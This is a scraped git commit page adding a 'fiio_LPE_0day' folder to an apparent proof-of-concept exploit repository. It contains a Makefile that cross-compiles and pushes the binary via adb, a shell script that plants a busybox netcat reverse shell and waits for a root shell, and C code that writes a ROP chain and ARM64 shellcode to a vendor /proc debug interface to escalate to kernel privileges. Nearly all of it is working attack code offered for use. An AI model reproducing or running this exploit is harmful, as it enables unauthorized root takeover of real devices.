STRLCPY/stigward_PoCs-and-Exploits

added fiio_LPE_0day
stigward committed 1 year ago

d9815ef1

1 parent a4c7c416

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

fiio_LPE_0day/Makefile

1	+	# Makefile for CVE-2019-2215
2	+	#
3	+	# NDK_ROOT=/home/ashfaq/Android/Sdk/ndk/21.0.6113669 make
4	+	#
5	+
6	+	CXXFLAGS := -static -O3 -Wall -Wextra -g
7	+
8	+	#CROSS_COMPILE := $(HOME)/Android/Sdk/ndk/25.1.8937393/toolchains/llvm/prebuilt/linux-x86_64/bin
9	+	CROSS_COMPILE := $(HOME)/Downloads/android-ndk-r22b/toolchains/llvm/prebuilt/linux-x86_64/bin
10	+	TARGET_PLATFORM := $(ARCH)-linux-android
11	+	CXX_PATH := $(CROSS_COMPILE)/aarch64-linux-android30-clang++
12	+
13	+	TRIGGER_SRC := poc.c
14	+	TRIGGER_OUTPUT := poc
15	+
16	+	# default rule
17	+	default: all
18	+
19	+	# phony rules
20	+	.PHONY: all
21	+
22	+	all: clean build-trigger push-trigger
23	+
24	+	build-trigger:
25	+	@echo Building: $(TRIGGER_OUTPUT)
26	+	@$(CXX_PATH) $(CXXFLAGS) -o $(TRIGGER_OUTPUT) $(TRIGGER_SRC)
27	+
28	+	clean:
29	+	@echo Removing: $(TRIGGER_OUTPUT)
30	+	@rm -f $(TRIGGER_OUTPUT)
31	+
32	+	push-trigger:
33	+	@echo Pushing: $(TRIGGER_OUTPUT) to /data/local/tmp
34	+	@adb push $(TRIGGER_OUTPUT) /data/local/tmp
35	+
36	+

■ ■ ■ ■ ■ ■

fiio_LPE_0day/exploit

1	+	echo "[+] Creating malicious script at /data/local/tmp/cmd..."
2	+	echo "#!/system/bin/sh" >> /data/local/tmp/cmd
3	+	echo "/system/bin/busybox1.11 nc 127.0.0.1 4444 -e /system/bin/sh" >> /data/local/tmp/cmd
4	+	chmod 777 cmd
5	+
6	+	echo "[+] Starting exploit..."
7	+	/data/local/tmp/poc 2>/dev/null
8	+	sleep 5
9	+
10	+	echo "[+] Launching listener..."
11	+	echo "[!] Wait for r00t shell..."
12	+	/system/bin/busybox1.11 nc -lp 4444
13	+

■ ■ ■ ■ ■ ■

fiio_LPE_0day/poc.c

1	+	#include <stdio.h>
2	+	#include <string.h>
3	+	#include <stdlib.h>
4	+	#include <iostream>
5	+	#include <fcntl.h>
6	+	#include <unistd.h>
7	+	#include <sys/stat.h>
8	+	#include <sys/types.h>
9	+	#include <unistd.h>
10	+	#include <sys/mman.h>
11	+	#include <sys/types.h>
12	+	#include <sys/wait.h>
13	+	#include <spawn.h>
14	+
15	+	uint64_t kernel_base = 0xFFFFFFC000080000ULL;
16	+	uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;
17	+	uint64_t nop = 0xd503201fd503201f;
18	+	uint64_t junk = 0x4242424242424242;
19	+
20	+	static int win() {
21	+	puts("[+] Returned from supervisor mode\n");
22	+	return 0;
23	+	}
24	+
25	+
26	+	static int exploit() {
27	+	int fd;
28	+	fd = open("/proc/ftxxxx-debug", O_RDWR);
29	+	unsigned char buf[4096];
30	+	memset(buf, 0x41, 1);
31	+	memset(buf+1, 0x0, 1023);
32	+
33	+	uint64_t stack_size = 0x1000;
34	+	void *stack_base = mmap(NULL, stack_size, PROT_READ \| PROT_WRITE, MAP_PRIVATE \| MAP_ANONYMOUS \| MAP_STACK, -1, 0);
35	+	if(stack_base == MAP_FAILED) {
36	+	puts("[!] mmap failed!");
37	+	return -1;
38	+	}
39	+
40	+	void stack_top = (void )((uint64_t)stack_base + stack_size);
41	+
42	+
43	+	unsigned char shellcode[] = {
44	+	0x02, 0xf9, 0x98, 0xd2, 0x42, 0x18, 0xa0, 0xf2,
45	+	0x02, 0xf8, 0xdf, 0xf2, 0xe2, 0xff, 0xff, 0xf2,
46	+	0xe3, 0x05, 0x80, 0x52, 0x43, 0x00, 0x00, 0x39,
47	+	0x83, 0x0c, 0x80, 0x52, 0x43, 0x04, 0x00, 0x39,
48	+	0x23, 0x0c, 0x80, 0x52, 0x43, 0x08, 0x00, 0x39,
49	+	0x83, 0x0e, 0x80, 0x52, 0x43, 0x0c, 0x00, 0x39,
50	+	0x23, 0x0c, 0x80, 0x52, 0x43, 0x10, 0x00, 0x39,
51	+	0xe3, 0x05, 0x80, 0x52, 0x43, 0x14, 0x00, 0x39,
52	+	0x83, 0x0d, 0x80, 0x52, 0x43, 0x18, 0x00, 0x39,
53	+	0xe3, 0x0d, 0x80, 0x52, 0x43, 0x1c, 0x00, 0x39,
54	+	0x63, 0x0c, 0x80, 0x52, 0x43, 0x20, 0x00, 0x39,
55	+	0x23, 0x0c, 0x80, 0x52, 0x43, 0x24, 0x00, 0x39,
56	+	0x83, 0x0d, 0x80, 0x52, 0x43, 0x28, 0x00, 0x39,
57	+	0xe3, 0x05, 0x80, 0x52, 0x43, 0x2c, 0x00, 0x39,
58	+	0x83, 0x0e, 0x80, 0x52, 0x43, 0x30, 0x00, 0x39,
59	+	0xa3, 0x0d, 0x80, 0x52, 0x43, 0x34, 0x00, 0x39,
60	+	0x03, 0x0e, 0x80, 0x52, 0x43, 0x38, 0x00, 0x39,
61	+	0xe3, 0x05, 0x80, 0x52, 0x43, 0x3c, 0x00, 0x39,
62	+	0x63, 0x0c, 0x80, 0x52, 0x43, 0x40, 0x00, 0x39,
63	+	0xa3, 0x0d, 0x80, 0x52, 0x43, 0x44, 0x00, 0x39,
64	+	0x83, 0x0c, 0x80, 0x52, 0x43, 0x48, 0x00, 0x39,
65	+	0xe3, 0x03, 0x1f, 0xaa, 0x43, 0x30, 0x01, 0xf8,
66	+	0xa2, 0x02, 0x02, 0xd1, 0x41, 0x00, 0x40, 0xf9,
67	+	0x44, 0x04, 0x40, 0xf9, 0xe0, 0x03, 0x1f, 0xaa,
68	+	0x04, 0x41, 0x18, 0xd5, 0x21, 0x40, 0x18, 0xd5,
69	+	0x00, 0x40, 0x18, 0xd5, 0xe0, 0x03, 0x9f, 0xd6,
70	+	};
71	+
72	+
73	+	uint64_t chain = (uint64_t )&buf[1024];
74	+	*chain++ = (uint64_t)blr_x21;
75	+	*chain++ = (uint64_t)junk;
76	+	*chain++ = (uint64_t)junk;
77	+	*chain++ = (uint64_t)junk;
78	+	*chain++ = ((uint64_t)&win +0x8);
79	+	*chain++ = (uint64_t)((uint64_t)&stack_top);
80	+	*chain++ = (uint64_t)nop;
81	+	*chain++ = (uint64_t)nop;
82	+	*chain++ = (uint64_t)nop;
83	+	*chain++ = (uint64_t)nop;
84	+	*chain++ = (uint64_t)nop;
85	+	*chain++ = (uint64_t)nop;
86	+	*chain++ = (uint64_t)nop;
87	+	*chain++ = (uint64_t)nop;
88	+	*chain++ = (uint64_t)nop;
89	+	*chain++ = (uint64_t)nop;
90	+	*chain++ = (uint64_t)nop;
91	+	*chain++ = (uint64_t)nop;
92	+	*chain++ = (uint64_t)nop;
93	+	*chain++ = (uint64_t)nop;
94	+	*chain++ = (uint64_t)nop;
95	+	*chain++ = (uint64_t)nop;
96	+	*chain++ = (uint64_t)nop;
97	+	*chain++ = (uint64_t)nop;
98	+	memcpy(buf + 1216, shellcode, sizeof(shellcode));
99	+
100	+	puts("[+] Ropping to shellcode...");
101	+	write(fd, buf, 1024 + 1216 + sizeof(shellcode));
102	+	puts("[-] Something went wrong...\n");
103	+	return 0;
104	+	}
105	+
106	+	int main() {
107	+	std::cout << "[+] Starting trigger...\n";
108	+	exploit();
109	+	return 0;
110	+	}
111	+
112	+

added fiio_LPE_0day